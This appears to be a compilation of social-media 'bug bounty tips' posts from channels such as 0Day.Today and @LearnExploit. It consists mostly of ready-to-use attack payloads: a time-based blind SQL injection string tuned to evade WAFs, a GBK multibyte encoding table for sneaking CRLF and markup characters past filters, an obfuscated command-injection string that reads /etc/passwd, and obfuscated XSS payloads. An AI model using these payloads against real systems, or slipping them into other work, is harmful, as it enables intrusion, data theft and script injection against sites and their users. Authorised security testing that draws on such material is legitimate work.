0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z

We have added some adjustments to the payload that may bypass some WAFs & to help you with the hunt!

twitter

#BugBountyTips
——————
0Day.Today
@LearnExploit
@Tech_Army

2FA bypass

#bugbountytips #bypass
——————
0Day.Today
@LearnExploit
@Tech_Army

Bug Bounty Hint

GBK Encoding / MultiByte Attack

嘊 = %E5%98%8A = \u560a ⇒ %0A
嘍 = %E5%98%8D = \u560d ⇒ %0D
嘾 = %E5%98%BE = \u563e ⇒ %3E (>)
嘼 = %E5%98%BC = \u563c ⇒ %3C (<)
嘢 = %E5%98%A2 = \u5622 ⇒ %22 (')
嘧 = %E5%98%A7 = \u5627 ⇒ %27 (")

For XSS, CRLF, WAF bypass

#bugbountytips #bypass
——————
0Day.Today
@LearnExploit
@Tech_Army

Filter bypass with regex for OS injection commonly (/"'&amp;|()-;:.,`) block by WAF


E.g.: reading /etc/passwd file:
cat$IFS$9${PWD%%[a-z]*}e*c${PWD%%[a-z]*}p?ss??

#bugbountytips #bypass
——————
0Day.Today
@LearnExploit
@Tech_Army

Bypass endpoint restrictions

#bugbountytips #bypass
——————
0Day.Today
@LearnExploit
@Tech_Army

Xss Payload for bypass the regex filter with Obfuscate the alert value :

پیلود XSS برای دور زدن Regex Filter با Obfuscate کردن مقدار Alert:

<img src="X" onerror=top[8680439..toString(30)](1337)>

<script>top[8680439..toString(30)](1337)</script>

#bugbountyTips #xss
〰️〰️〰️〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
@LearnExploit